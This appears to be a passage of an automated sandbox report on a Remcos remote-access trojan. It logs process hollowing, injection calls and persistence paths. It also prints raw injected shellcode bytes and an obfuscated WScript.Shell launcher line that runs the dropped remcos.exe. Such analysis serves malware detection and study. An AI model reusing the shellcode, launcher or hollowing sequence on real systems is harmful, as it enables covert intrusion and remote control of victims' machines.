èüÿÿhÕOd"W‰Fèüÿÿhy.ÔW‰Fèöûÿÿh±÷W‰FèèûÿÿheóW÷W‰FèÚûÿÿh¯4P“W‰FèÌûÿÿh{=#W‰F<è¾ûÿÿƒÄ@hOû~ W‰Fè­ûÿÿhà=!6W‰FHèŸûÿÿhh‰#W‰è’ûÿÿ‰FLhÍeWè„ûÿÿhÓ1ÆVW‰FPèvûÿÿh7œ½W‰FTèhûÿÿh£-ãW‰FXèZûÿÿ‰F\ƒÄ8EðPÇEðshelÇEôl32ÿӋø…ÿt"hÀåz°W‰~dè,ûÿÿhêêºW‰FlèûÿÿƒÄ‰FpEøPÇEøuserfÇEü32ÆEþÿV ‹ø…ÿtAhqV°0W‰~hèìúÿÿhkV°0W‰FxèÞúÿÿh&cj—W‰FtèÐúÿÿh<cj—W‰F|èÂúÿÿƒÄ ‰†€‹Æë3À_^[ÉÃU‹ìƒì\V‹uW3ÿ;÷„îSè¤ýÿÿ‹Ø;ßu WÿDéՍ†‰EüPëj2ÿSPÿuüWWÿSL…ÀuïjdÿSPF‰Eø‰E9>tYÿ¶¶ŽQP¾ ‹Ãè¾üÿÿ‰}3ÿƒÄ 9>t1jDE¤WPèjEèWPèüƒÄEèPE¤PWWj WWWWÿuÿS$9¾(t†lP†,Pÿu‹Ãè½úÿÿƒÄ 9¾tëj2ÿSPÿuüWWÿSL…ÀuïjdÿSPÿuøÿSWÿSD[_3À^ÉÂU‹ìƒì SW3ÿWWjWjh€ÿu‰}øÿV‹Øƒûÿu3Àë>WSÿV‰Eô;Çt+jh0PWÿV@‰Eø;ÇtWMüQÿuô‰}üPSÿV‹Eü‹M ‰SÿV‹Eø_[É÷f‰f…ÒtV‹ð+ñƒÁ·f‰f…Òuñ^ÃU‹ìQQ‹E‰Eü‹EüE‰Eø‹Eü;Eøt‹EüŠM ˆ‹Eü@‰Eüëç‹EÉÃfƒ8V‹ðt ƒÆfƒ>u÷+ò· f‰ ƒÂf…Éuñ^ËD$Š@„Éuù+D$HÅÉu3ÀÃfƒ9‹Át ƒÀfƒ8u÷+ÁÑøÅÉt èÚÿÿÿ…ÀtDAþë fƒù\t ƒè·f…Éuï3ÀÃ
process_handle: 0x00000100
base_address: 0x000b0000
success 1 0
1619628991.574187
WriteProcessMemory
process_identifier: 4136
buffer: C:\Users\Administrator.Oskar-PC\AppData\Roaming\remcos\remcos.exeC:\Users\Administrator.Oskar-PC\AppData\Roaming\gffhjhkhkh\sdfghjkhjjjjjg.exeC:\Users\Administrator.Oskar-PC\AppData\Roaming\remcos\remcos.exeZMset wtLQzIXR = createobjECT("WscrIpT.ShEll") wTlqZIxR.rUn """%ls""", 0, False
process_handle: 0x00000100
base_address: 0x00100000
success 1 0
1619628999.951403
WriteProcessMemory
process_identifier: 4756
buffer: Q¹0d‹‹@ ‹@ ‹‹‹@‰$‹$YÃVWR¾§ÆgNè„Yƒøv· ¿Zwf;Ït ¿Ntf;ÏuƒÂƒè…Àt‹ÎÁá‹þÁïϾ:Ï3ñBHué_‹Æ^ÃU‹ìQQ‹MSVW…Ét;¸MZf9u1‹A<Át*8PEu"‹@xƒeüÁ‹x‹X$‹p ‹@ùÙñ‰Eø…Àu 3À_^[ÉËM‹Eü‹†ÑèOÿÿÿ;E t ÿEü‹Eü;Eøràë׋Eü·C‹‡EëÊU‹ìQSW3ÿWWjWjh@ÿuÿV‹Øƒûÿu3Àë&WWWS‰}üÿV0W‹}EüPWÿu SÿV SÿV3À9}ü”À_[ÉÅÉtè•…Àt3Éf‰ÃU‹ììV‹ð…äüÿÿP3ÀPPjPÿVl…À…Žj\Xf‰Eü3Àj.f‰EþXjvf‰EðXf‰EòjbXf‰EôjsXf‰Eö3Àf‰EøUü…äüÿÿèÖ‹U è΍UðèÆÿu…ìþÿÿÿuPÿVxƒÄ …äüÿÿPÿV…ìþÿÿPèÂ@P…ìþÿÿP…äüÿÿPèîþÿÿƒÄ^ÉÃU‹ìì,j:XjZf‰EÜXjof‰EÞXjnf‰EàXjef‰EâXjIf‰EäXjdf‰EæXjef‰EèXjnf‰EêXjtf‰EìXjif‰EîXjff‰EðXjif‰EòXf‰EôjeXf‰EöjrXf‰Eø3Àf‰Eú…Ôýÿÿ謍UÜè÷EÿPÆEÿèPEÿP…ÔýÿÿPè?þÿÿƒÄÉÃU‹ìQƒeüV‹ðEüPÿuèþYY…Àtƒ}ütÿuüPÿu è þÿÿƒÄ …Àt3À@ë3À^ÉÃU‹ììSV‹ð‹Ï…øýÿÿè'‹Èè(þÿÿ3ÛS…øýÿÿPÿVWÿV8] uWÿu‹Æè~ÿÿÿYY‹Øë €} u5SWÿuÿWÿV(3ۃøÿ‹Ï•Ãèªþÿÿƒûu9]u WÿV(ƒÈPWÿV,3À@ë3À^[ÉÃU‹ìƒìSVWèsüÿÿ‹ø…ÿ„"h"¿ŠWèÌüÿÿ‹ØYY…Û„ jh0h„jÿӋð…ö„ñh¼Û«½W‰~`‰^@è•üÿÿhÒ¼‰W‰F$è‡üÿÿh|QgjW‰F(èyüÿÿhëI”W‰F,èküÿÿh•å©—W‰F0è]üÿÿh¥°(W‰F4èOüÿÿh)·W‰F8èAüÿÿh[uŠðW‰FDè3üÿÿƒÄ@‹Øhd†óuW‰^ è üÿÿh¢¦aëW‰F èüÿÿhÕOd"W‰Fèüÿÿhy.ÔW‰Fèöûÿÿh±÷W‰FèèûÿÿheóW÷W‰FèÚûÿÿh¯4P“W‰FèÌûÿÿh{=#W‰F<è¾ûÿÿƒÄ@hOû~ W‰Fè­ûÿÿhà=!6W‰FHèŸûÿÿhh‰#W‰è’ûÿÿ‰FLhÍeWè„ûÿÿhÓ1ÆVW‰FPèvûÿÿh7œ½W‰FTèhûÿÿh£-ãW‰FXèZûÿÿ‰F\ƒÄ8EðPÇEðshelÇEôl32ÿӋø…ÿt"hÀåz°W‰~dè,ûÿÿhêêºW‰FlèûÿÿƒÄ‰FpEøPÇEøuserfÇEü32ÆEþÿV ‹ø…ÿtAhqV°0W‰~hèìúÿÿhkV°0W‰FxèÞúÿÿh&cj—W‰FtèÐúÿÿh<cj—W‰F|èÂúÿÿƒÄ ‰†€‹Æë3À_^[ÉÃU‹ìƒì\V‹uW3ÿ;÷„îSè¤ýÿÿ‹Ø;ßu WÿDéՍ†‰EüPëj2ÿSPÿuüWWÿSL…ÀuïjdÿSPF‰Eø‰E9>tYÿ¶¶ŽQP¾ ‹Ãè¾üÿÿ‰}3ÿƒÄ 9>t1jDE¤WPèjEèWPèüƒÄEèPE¤PWWj WWWWÿuÿS$9¾(t†lP†,Pÿu‹Ãè½úÿÿƒÄ 9¾tëj2ÿSPÿuüWWÿSL…ÀuïjdÿSPÿuøÿSWÿSD[_3À^ÉÂU‹ìƒì SW3ÿWWjWjh€ÿu‰}øÿV‹Øƒûÿu3Àë>WSÿV‰Eô;Çt+jh0PWÿV@‰Eø;ÇtWMüQÿuô‰}üPSÿV‹Eü‹M ‰SÿV‹Eø_[É÷f‰f…ÒtV‹ð+ñƒÁ·f‰f…Òuñ^ÃU‹ìQQ‹E‰Eü‹EüE‰Eø‹Eü;Eøt‹EüŠM ˆ‹Eü@‰Eüëç‹EÉÃfƒ8V‹ðt ƒÆfƒ>u÷+ò· f‰ ƒÂf…Éuñ^ËD$Š@„Éuù+D$HÅÉu3ÀÃfƒ9‹Át ƒÀfƒ8u÷+ÁÑøÅÉt èÚÿÿÿ…ÀtDAþë fƒù\t ƒè·f…Éuï3ÀÃ
process_handle: 0x00000100
base_address: 0x000b0000
success 1 0
1619628999.951403
WriteProcessMemory
process_identifier: 4756
buffer: C:\Users\Administrator.Oskar-PC\AppData\Roaming\remcos\remcos.exeC:\Users\Administrator.Oskar-PC\AppData\Roaming\gffhjhkhkh\sdfghjkhjjjjjg.exeC:\Users\Administrator.Oskar-PC\AppData\Roaming\remcos\remcos.exeZMset wtLQzIXR = createobjECT("WscrIpT.ShEll") wTlqZIxR.rUn """%ls""", 0, False
process_handle: 0x00000100
base_address: 0x000c0000
success 1 0
Used NtSetContextThread to modify a thread in a remote process indicative of process injection (32 个事件)
Process injection Process 2144 called NtSetContextThread to modify thread in remote process 2528
Process injection Process 3164 called NtSetContextThread to modify thread in remote process 3400
Process injection Process 3644 called NtSetContextThread to modify thread in remote process 4068
Process injection Process 3904 called NtSetContextThread to modify thread in remote process 3384
Process injection Process 3552 called NtSetContextThread to modify thread in remote process 3284
Process injection Process 3728 called NtSetContextThread to modify thread in remote process 3472
Process injection Process 3260 called NtSetContextThread to modify thread in remote process 2812
Process injection Process 1876 called NtSetContextThread to modify thread in remote process 2880
Process injection Process 4004 called NtSetContextThread to modify thread in remote process 2856
Process injection Process 2420 called NtSetContextThread to modify thread in remote process 2440
Process injection Process 4212 called NtSetContextThread to modify thread in remote process 5108
Process injection Process 4936 called NtSetContextThread to modify thread in remote process 4304
Process injection Process 5036 called NtSetContextThread to modify thread in remote process 4772
Process injection Process 4340 called NtSetContextThread to modify thread in remote process 4820
Process injection Process 2036 called NtSetContextThread to modify thread in remote process 620
Process injection Process 4148 called NtSetContextThread to modify thread in remote process 4836
Time & API Arguments Status Return Repeated
1619628933.635
NtSetContextThread
thread_handle: 0x00000108
registers.eip: 0
registers.esp: 0
registers.edi: 0
registers.eax: 4274820
registers.ebp: 0
registers.edx: 0
registers.ebx: 2130567168
registers.esi: 0
registers.ecx: 0
process_identifier: 2528
success 0 0
1619628947.1665
NtSetContextThread
thread_handle: 0x00000108
registers.eip: 0
registers.esp: 0
registers.edi: 0
registers.eax: 4274820
registers.ebp: 0
registers.edx: 0
registers.ebx: 2130567168
registers.esi: 0
registers.ecx: 0
process_identifier: 3400
success 0 0
1619628960.4325
NtSetContextThread
thread_handle: 0x00000108
registers.eip: 0
registers.esp: 0
registers.edi: 0
registers.eax: 4274820
registers.ebp: 0
registers.edx: 0
registers.ebx: 2130567168
registers.esi: 0
registers.ecx: 0
process_identifier: 4068
success 0 0
1619628961.275625
NtSetContextThread
thread_handle: 0x00000108
registers.eip: 0
registers.esp: 0
registers.edi: 0
registers.eax: 4274820
registers.ebp: 0
registers.edx: 0
registers.ebx: 2130567168
registers.esi: 0
registers.ecx: 0
process_identifier: 3384
success 0 0
1619628973.65075
NtSetContextThread
thread_handle: 0x00000108
registers.eip: 0
registers.esp: 0
registers.edi: 0
registers.eax: 4274820
registers.ebp: 0
registers.edx: 0
registers.ebx: 2130567168
registers.esi: 0
registers.ecx: 0
process_identifier: 3284
success 0 0
1619628974.22925
NtSetContextThread
thread_handle: 0x00000108
registers.eip: 0
registers.esp: 0
registers.edi: 0
registers.eax: 4274820
registers.ebp: 0
registers.edx: 0
registers.ebx: 2130567168
registers.esi: 0
registers.ecx: 0
process_identifier: 3472
success 0 0
1619628978.369875
NtSetContextThread
thread_handle: 0x00000108
registers.eip: 0
registers.esp: 0
registers.edi: 0
registers.eax: 4274820
registers.ebp: 0
registers.edx: 0
registers.ebx: 2130567168
registers.esi: 0
registers.ecx: 0
process_identifier: 2812
success 0 0
1619628988.450249
NtSetContextThread
thread_handle: 0x00000108
registers.eip: 0
registers.esp: 0
registers.edi: 0
registers.eax: 4274820
registers.ebp: 0
registers.edx: 0
registers.ebx: 2130567168
registers.esi: 0
registers.ecx: 0
process_identifier: 2880
success 0 0
1619628991.733436
NtSetContextThread
thread_handle: 0x00000108
registers.eip: 0
registers.esp: 0
registers.edi: 0
registers.eax: 4274820
registers.ebp: 0
registers.edx: 0
registers.ebx: 2130567168
registers.esi: 0
registers.ecx: 0
process_identifier: 2856
success 0 0
1619628990.029501
NtSetContextThread
thread_handle: 0x00000108
registers.eip: 0
registers.esp: 0
registers.edi: 0
registers.eax: 4274820
registers.ebp: 0
registers.edx: 0
registers.ebx: 2130567168
registers.esi: 0
registers.ecx: 0
process_identifier: 2440
success 0 0
1619629004.799534
NtSetContextThread
thread_handle: 0x00000108
registers.eip: 0
registers.esp: 0
registers.edi: 0
registers.eax: 4274820
registers.ebp: 0
registers.edx: 0
registers.ebx: 2130567168
registers.esi: 0
registers.ecx: 0
process_identifier: 5108
success 0 0
1619629013.674159
NtSetContextThread
thread_handle: 0x00000108
registers.eip: 0
registers.esp: 0
registers.edi: 0
registers.eax: 4274820
registers.ebp: 0
registers.edx: 0
registers.ebx: 2130567168
registers.esi: 0
registers.ecx: 0
process_identifier: 4304
success 0 0
1619629016.362534
NtSetContextThread
thread_handle: 0x00000108
registers.eip: 0
registers.esp: 0
registers.edi: 0
registers.eax: 4274820
registers.ebp: 0
registers.edx: 0
registers.ebx: 2130567168
registers.esi: 0
registers.ecx: 0
process_identifier: 4772
success 0 0
1619629026.940284
NtSetContextThread
thread_handle: 0x00000108
registers.eip: 0
registers.esp: 0
registers.edi: 0
registers.eax: 4274820
registers.ebp: 0
registers.edx: 0
registers.ebx: 2130567168
registers.esi: 0
registers.ecx: 0
process_identifier: 4820
success 0 0
1619629035.111909
NtSetContextThread
thread_handle: 0x00000108
registers.eip: 0
registers.esp: 0
registers.edi: 0
registers.eax: 4274820
registers.ebp: 0
registers.edx: 0
registers.ebx: 2130567168
registers.esi: 0
registers.ecx: 0
process_identifier: 620
success 0 0
1619629037.456284
NtSetContextThread
thread_handle: 0x00000108
registers.eip: 0
registers.esp: 0
registers.edi: 0
registers.eax: 4274820
registers.ebp: 0
registers.edx: 0
registers.ebx: 2130567168
registers.esi: 0
registers.ecx: 0
process_identifier: 4836
success 0 0
One or more non-safelisted processes were created (12 个事件)
parent_process wscript.exe martian_process "C:\Windows\System32\cmd.exe" /c "C:\Users\Administrator.Oskar-PC\AppData\Roaming\remcos\remcos.exe"
parent_process wscript.exe martian_process cmd /c "C:\Users\Administrator.Oskar-PC\AppData\Roaming\remcos\remcos.exe"
parent_process wscript.exe martian_process "C:\Windows\System32\cmd.exe" /c "C:\Users\Administrator.Oskar-PC\AppData\Roaming\remcos\remcos.exe"
parent_process wscript.exe martian_process cmd /c "C:\Users\Administrator.Oskar-PC\AppData\Roaming\remcos\remcos.exe"
parent_process wscript.exe martian_process "C:\Windows\System32\cmd.exe" /c "C:\Users\Administrator.Oskar-PC\AppData\Roaming\remcos\remcos.exe"
parent_process wscript.exe martian_process cmd /c "C:\Users\Administrator.Oskar-PC\AppData\Roaming\remcos\remcos.exe"
parent_process wscript.exe martian_process "C:\Windows\System32\cmd.exe" /c "C:\Users\Administrator.Oskar-PC\AppData\Roaming\remcos\remcos.exe"
parent_process wscript.exe martian_process cmd /c "C:\Users\Administrator.Oskar-PC\AppData\Roaming\remcos\remcos.exe"
parent_process wscript.exe martian_process "C:\Windows\System32\cmd.exe" /c "C:\Users\Administrator.Oskar-PC\AppData\Roaming\remcos\remcos.exe"
parent_process wscript.exe martian_process cmd /c "C:\Users\Administrator.Oskar-PC\AppData\Roaming\remcos\remcos.exe"
parent_process wscript.exe martian_process "C:\Windows\System32\cmd.exe" /c "C:\Users\Administrator.Oskar-PC\AppData\Roaming\remcos\remcos.exe"
parent_process wscript.exe martian_process cmd /c "C:\Users\Administrator.Oskar-PC\AppData\Roaming\remcos\remcos.exe"
Resumed a suspended thread in a remote process potentially indicative of process injection (32 个事件)
Process injection Process 2144 resumed a thread in remote process 2528
Process injection Process 3164 resumed a thread in remote process 3400
Process injection Process 3644 resumed a thread in remote process 4068
Process injection Process 3904 resumed a thread in remote process 3384
Process injection Process 3552 resumed a thread in remote process 3284
Process injection Process 3728 resumed a thread in remote process 3472
Process injection Process 3260 resumed a thread in remote process 2812
Process injection Process 1876 resumed a thread in remote process 2880
Process injection Process 4004 resumed a thread in remote process 2856
Process injection Process 2420 resumed a thread in remote process 2440
Process injection Process 4212 resumed a thread in remote process 5108
Process injection Process 4936 resumed a thread in remote process 4304
Process injection Process 5036 resumed a thread in remote process 4772
Process injection Process 4340 resumed a thread in remote process 4820
Process injection Process 2036 resumed a thread in remote process 620
Process injection Process 4148 resumed a thread in remote process 4836
Time & API Arguments Status Return Repeated
1619628933.65
NtResumeThread
thread_handle: 0x00000108
suspend_count: 1
process_identifier: 2528
success 0 0
1619628947.1825
NtResumeThread
thread_handle: 0x00000108
suspend_count: 1
process_identifier: 3400
success 0 0
1619628960.4635
NtResumeThread
thread_handle: 0x00000108
suspend_count: 1
process_identifier: 4068
success 0 0
1619628961.369625
NtResumeThread
thread_handle: 0x00000108
suspend_count: 1
process_identifier: 3384
success 0 0
1619628973.68275
NtResumeThread
thread_handle: 0x00000108
suspend_count: 1
process_identifier: 3284
success 0 0
1619628975.22925
NtResumeThread
thread_handle: 0x00000108
suspend_count: 1
process_identifier: 3472
success 0 0
1619628993.525875
NtResumeThread
thread_handle: 0x00000108
suspend_count: 1
process_identifier: 2812
success 0 0
1619628990.810249
NtResumeThread
thread_handle: 0x00000108
suspend_count: 1
process_identifier: 2880
success 0 0
1619628997.468436
NtResumeThread
thread_handle: 0x00000108
suspend_count: 1
process_identifier: 2856
success 0 0
1619628992.247501
NtResumeThread
thread_handle: 0x00000108
suspend_count: 1
process_identifier: 2440
success 0 0
1619629024.924534
NtResumeThread
thread_handle: 0x00000108
suspend_count: 1
process_identifier: 5108
success 0 0
1619629014.628159
NtResumeThread
thread_handle: 0x00000108
suspend_count: 1
process_identifier: 4304
success 0 0
1619629021.003534
NtResumeThread
thread_handle: 0x00000108
suspend_count: 1
process_identifier: 4772
success 0 0
1619629027.596284
NtResumeThread
thread_handle: 0x00000108
suspend_count: 1
process_identifier: 4820
success 0 0
1619629041.330909
NtResumeThread
thread_handle: 0x00000108
suspend_count: 1
process_identifier: 620
success 0 0
1619629047.159284
NtResumeThread
thread_handle: 0x00000108
suspend_count: 1
process_identifier: 4836
success 0 0
Connects to an IP address that is no longer responding to requests (legitimate services will remain up-and-running usually) (1 个事件)
dead_host 172.217.24.14:443
Executed a process and injected code into it, probably while unpacking (50 out of 187 个事件)
Time & API Arguments Status Return Repeated
1619610631.281
CreateProcessInternalW
thread_identifier: 1888
thread_handle: 0x00000108
process_identifier: 1752
current_directory:
filepath: C:\Windows\System32\notepad.exe
track: 1
command_line:
filepath_r: C:\Windows\system32\notepad.exe
stack_pivoted: 0
creation_flags: 32 (NORMAL_PRIORITY_CLASS)
process_handle: 0x00000100
inherit_handles: 0
success 1 0
1619610631.281
NtAllocateVirtualMemory
process_identifier: 1752
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
process_handle: 0x00000100
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
base_address: 0x000b0000
success 0 0
1619610631.281
NtAllocateVirtualMemory
process_identifier: 1752
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 4 (PAGE_READWRITE)
process_handle: 0x00000100
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
base_address: 0x000c0000
success 0 0
1619610631.281
WriteProcessMemory
process_identifier: 1752
buffer: Q¹0d‹‹@ ‹@ ‹‹‹@‰$‹$YÃVWR¾§ÆgNè„Yƒøv· ¿Zwf;Ït ¿Ntf;ÏuƒÂƒè…Àt‹ÎÁá‹þÁïϾ:Ï3ñBHué_‹Æ^ÃU‹ìQQ‹MSVW…Ét;¸MZf9u1‹A<Át*8PEu"‹@xƒeüÁ‹x‹X$‹p ‹@ùÙñ‰Eø…Àu 3À_^[ÉËM‹Eü‹†ÑèOÿÿÿ;E t ÿEü‹Eü;Eøràë׋Eü·C‹‡EëÊU‹ìQSW3ÿWWjWjh@ÿuÿV‹Øƒûÿu3Àë&WWWS‰}üÿV0W‹}EüPWÿu SÿV SÿV3À9}ü”À_[ÉÅÉtè•…Àt3Éf‰ÃU‹ììV‹ð…äüÿÿP3ÀPPjPÿVl…À…Žj\Xf‰Eü3Àj.f‰EþXjvf‰EðXf‰EòjbXf‰EôjsXf‰Eö3Àf‰EøUü…äüÿÿèÖ‹U è΍UðèÆÿu…ìþÿÿÿuPÿVxƒÄ …äüÿÿPÿV…ìþÿÿPèÂ@P…ìþÿÿP…äüÿÿPèîþÿÿƒÄ^ÉÃU‹ìì,j:XjZf‰EÜXjof‰EÞXjnf‰EàXjef‰EâXjIf‰EäXjdf‰EæXjef‰EèXjnf‰EêXjtf‰EìXjif‰EîXjff‰EðXjif‰EòXf‰EôjeXf‰EöjrXf‰Eø3Àf‰Eú…Ôýÿÿ謍UÜè÷EÿPÆEÿèPEÿP…ÔýÿÿPè?þÿÿƒÄÉÃU‹ìQƒeüV‹ðEüPÿuèþYY…Àtƒ}ütÿuüPÿu è þÿÿƒÄ …Àt3À@ë3À^ÉÃU‹ììSV‹ð‹Ï…øýÿÿè'‹Èè(þÿÿ3ÛS…øýÿÿPÿVWÿV8] uWÿu‹Æè~ÿÿÿYY‹Øë €} u5SWÿuÿWÿV(3ۃøÿ‹Ï•Ãèªþÿÿƒûu9]u WÿV(ƒÈPWÿV,3À@ë3À^[ÉÃU‹ìƒìSVWèsüÿÿ‹ø…ÿ„"h"¿ŠWèÌüÿÿ‹ØYY…Û„ jh0h„jÿӋð…ö„ñh¼Û«½W‰~`‰^@è•üÿÿhÒ¼‰W‰F$è‡üÿÿh|QgjW‰F(èyüÿÿhëI”W‰F,èküÿÿh•å©—W‰F0è]üÿÿh¥°(W‰F4èOüÿÿh)·W‰F8èAüÿÿh[uŠðW‰FDè3üÿÿƒÄ@‹Øhd†óuW‰^ è üÿÿh¢¦aëW‰F èüÿÿhÕOd"W‰Fèüÿÿhy.ÔW‰Fèöûÿÿh±÷W‰FèèûÿÿheóW÷W‰FèÚûÿÿh¯4P“W‰FèÌûÿÿh{=#W‰F<è¾ûÿÿƒÄ@hOû~ W‰Fè­ûÿÿhà=!6W‰FHèŸûÿÿhh‰#W‰è’ûÿÿ‰FLhÍeWè„ûÿÿhÓ1ÆVW‰FPèvûÿÿh7œ½W‰FTèhûÿÿh£-ãW‰FXèZûÿÿ‰F\ƒÄ8EðPÇEðshelÇEôl32ÿӋø…ÿt"hÀåz°W‰~dè,ûÿÿhêêºW‰FlèûÿÿƒÄ‰FpEøPÇEøuserfÇEü32ÆEþÿV ‹ø…ÿtAhqV°0W‰~hèìúÿÿhkV°0W‰FxèÞúÿÿh&cj—W‰FtèÐúÿÿh<cj—W‰F|èÂúÿÿƒÄ ‰†€‹Æë3À_^[ÉÃU‹ìƒì\V‹uW3ÿ;÷„îSè¤ýÿÿ‹Ø;ßu WÿDéՍ†‰EüPëj2ÿSPÿuüWWÿSL…ÀuïjdÿSPF‰Eø‰E9>tYÿ¶¶ŽQP¾ ‹Ãè¾üÿÿ‰}3ÿƒÄ 9>t1jDE¤WPèjEèWPèüƒÄEèPE¤PWWj WWWWÿuÿS$9¾(t†lP†,Pÿu‹Ãè½úÿÿƒÄ 9¾tëj2ÿSPÿuüWWÿSL…ÀuïjdÿSPÿuøÿSWÿSD[_3À^ÉÂU‹ìƒì SW3ÿWWjWjh€ÿu‰}øÿV‹Øƒûÿu3Àë>WSÿV‰Eô;Çt+jh0PWÿV@‰Eø;ÇtWMüQÿuô‰}üPSÿV‹Eü‹M ‰SÿV‹Eø_[É÷f‰f…ÒtV‹ð+ñƒÁ·f‰f…Òuñ^ÃU‹ìQQ‹E‰Eü‹EüE‰Eø‹Eü;Eøt‹EüŠM ˆ‹Eü@‰Eüëç‹EÉÃfƒ8V‹ðt ƒÆfƒ>u÷+ò· f‰ ƒÂf…Éuñ^ËD$Š@„Éuù+D$HÅÉu3ÀÃfƒ9‹Át ƒÀfƒ8u÷+ÁÑøÅÉt èÚÿÿÿ…ÀtDAþë fƒù\t ƒè·f…Éuï3ÀÃ
process_handle: 0x00000100
base_address: 0x000b0000
success 1 0
1619610631.281
WriteProcessMemory
process_identifier: 1752
buffer: C:\Users\Administrator.Oskar-PC\AppData\Local\Temp\632e3d1eedfc816446787802aad4152f.exeC:\Users\Administrator.Oskar-PC\AppData\Roaming\gffhjhkhkh\sdfghjkhjjjjjg.exe"C:\Users\Administrator.Oskar-PC\AppData\Local\Temp\632e3d1eedfc816446787802aad4152f.exe" ZMset wtLQzIXR = createobjECT("WscrIpT.ShEll") wTlqZIxR.rUn """%ls""", 0, False
process_handle: 0x00000100
base_address: 0x000c0000
success 1 0
1619628921.416625
CreateProcessInternalW
thread_identifier: 2536
thread_handle: 0x000000d0
process_identifier: 2144
current_directory:
filepath: C:\Users\Administrator.Oskar-PC\AppData\Roaming\gffhjhkhkh\sdfghjkhjjjjjg.exe
track: 1
command_line:
filepath_r: C:\Users\Administrator.Oskar-PC\AppData\Roaming\gffhjhkhkh\sdfghjkhjjjjjg.exe
stack_pivoted: 0
creation_flags: 32 (NORMAL_PRIORITY_CLASS)
process_handle: 0x000000cc
inherit_handles: 0
success 1 0
1619628933.635
CreateProcessInternalW
thread_identifier: 1816
thread_handle: 0x00000108
process_identifier: 2528
current_directory:
filepath:
track: 1
command_line: "C:\Users\Administrator.Oskar-PC\AppData\Roaming\gffhjhkhkh\sdfghjkhjjjjjg.exe"
filepath_r:
stack_pivoted: 0
creation_flags: 4 (CREATE_SUSPENDED)
process_handle: 0x00000100
inherit_handles: 0
success 1 0
1619628933.635
NtUnmapViewOfSection
process_identifier: 2528
region_size: 4096
process_handle: 0x00000100
base_address: 0x00400000
success 0 0
1619628933.635
NtMapViewOfSection
section_handle: 0x00000110
process_identifier: 2528
commit_size: 131072
win32_protect: 64 (PAGE_EXECUTE_READWRITE)
buffer:
process_handle: 0x00000100
allocation_type: 0 ()
section_offset: 0
view_size: 131072
base_address: 0x00400000
success 0 0
1619628933.635
NtGetContextThread
thread_handle: 0x00000108
success 0 0
1619628933.635
NtSetContextThread
thread_handle: 0x00000108
registers.eip: 0
registers.esp: 0
registers.edi: 0
registers.eax: 4274820
registers.ebp: 0
registers.edx: 0
registers.ebx: 2130567168
registers.esi: 0
registers.ecx: 0
process_identifier: 2528
success 0 0
1619628933.65
NtResumeThread
thread_handle: 0x00000108
suspend_count: 1
process_identifier: 2528
success 0 0
1619628933.666
CreateProcessInternalW
thread_identifier: 2844
thread_handle: 0x0000010c
process_identifier: 1344
current_directory:
filepath:
track: 1
command_line: "C:\Users\Administrator.Oskar-PC\AppData\Roaming\gffhjhkhkh\sdfghjkhjjjjjg.exe" 2 2528 16921921
filepath_r:
stack_pivoted: 0
creation_flags: 32 (NORMAL_PRIORITY_CLASS)
process_handle: 0x0000011c
inherit_handles: 0
success 1 0
1619628934.963
CreateProcessInternalW
thread_identifier: 3168
thread_handle: 0x00000128
process_identifier: 3164
current_directory:
filepath: C:\Users\Administrator.Oskar-PC\AppData\Roaming\gffhjhkhkh\sdfghjkhjjjjjg.exe
track: 1
command_line:
filepath_r: C:\Users\Administrator.Oskar-PC\AppData\Roaming\gffhjhkhkh\sdfghjkhjjjjjg.exe
stack_pivoted: 0
creation_flags: 32 (NORMAL_PRIORITY_CLASS)
process_handle: 0x0000012c
inherit_handles: 0
success 1 0
1619628934.119125
NtResumeThread
thread_handle: 0x000001e0
suspend_count: 1
process_identifier: 2528
success 0 0
1619628934.275125
CreateProcessInternalW
thread_identifier: 3080
thread_handle: 0x00000214
process_identifier: 3076
current_directory: C:\Users\Administrator.Oskar-PC\AppData\Local\Temp
filepath: C:\Windows\System32\wscript.exe
track: 1
command_line: "C:\Windows\System32\WScript.exe" "C:\Users\ADMINI~1.OSK\AppData\Local\Temp\install.vbs"
filepath_r: C:\Windows\System32\WScript.exe
stack_pivoted: 0
creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
process_handle: 0x00000174
inherit_handles: 0
success 1 0
1619628936.104375
CreateProcessInternalW
thread_identifier: 3252
thread_handle: 0x000002b0
process_identifier: 3248
current_directory: C:\Users\Administrator.Oskar-PC\AppData\Local\Temp
filepath: C:\Windows\System32\cmd.exe
track: 1
command_line: "C:\Windows\System32\cmd.exe" /c "C:\Users\Administrator.Oskar-PC\AppData\Roaming\remcos\remcos.exe"
filepath_r: C:\Windows\System32\cmd.exe
stack_pivoted: 0
creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
process_handle: 0x000002f8
inherit_handles: 0
success 1 0
1619628947.1505
CreateProcessInternalW
thread_identifier: 3404
thread_handle: 0x00000108
process_identifier: 3400
current_directory:
filepath:
track: 1
command_line: "C:\Users\Administrator.Oskar-PC\AppData\Roaming\gffhjhkhkh\sdfghjkhjjjjjg.exe"
filepath_r:
stack_pivoted: 0
creation_flags: 4 (CREATE_SUSPENDED)
process_handle: 0x00000100
inherit_handles: 0
success 1 0
1619628947.1505
NtUnmapViewOfSection
process_identifier: 3400
region_size: 4096
process_handle: 0x00000100
base_address: 0x00400000
success 0 0
1619628947.1505
NtMapViewOfSection
section_handle: 0x00000110
process_identifier: 3400
commit_size: 131072
win32_protect: 64 (PAGE_EXECUTE_READWRITE)
buffer:
process_handle: 0x00000100
allocation_type: 0 ()
section_offset: 0
view_size: 131072
base_address: 0x00400000
success 0 0
1619628947.1665
NtGetContextThread
thread_handle: 0x00000108
success 0 0
1619628947.1665
NtSetContextThread
thread_handle: 0x00000108
registers.eip: 0
registers.esp: 0
registers.edi: 0
registers.eax: 4274820
registers.ebp: 0
registers.edx: 0
registers.ebx: 2130567168
registers.esi: 0
registers.ecx: 0
process_identifier: 3400
success 0 0
1619628947.1825
NtResumeThread
thread_handle: 0x00000108
suspend_count: 1
process_identifier: 3400
success 0 0
1619628947.1975
CreateProcessInternalW
thread_identifier: 3464
thread_handle: 0x0000010c
process_identifier: 3460
current_directory:
filepath:
track: 1
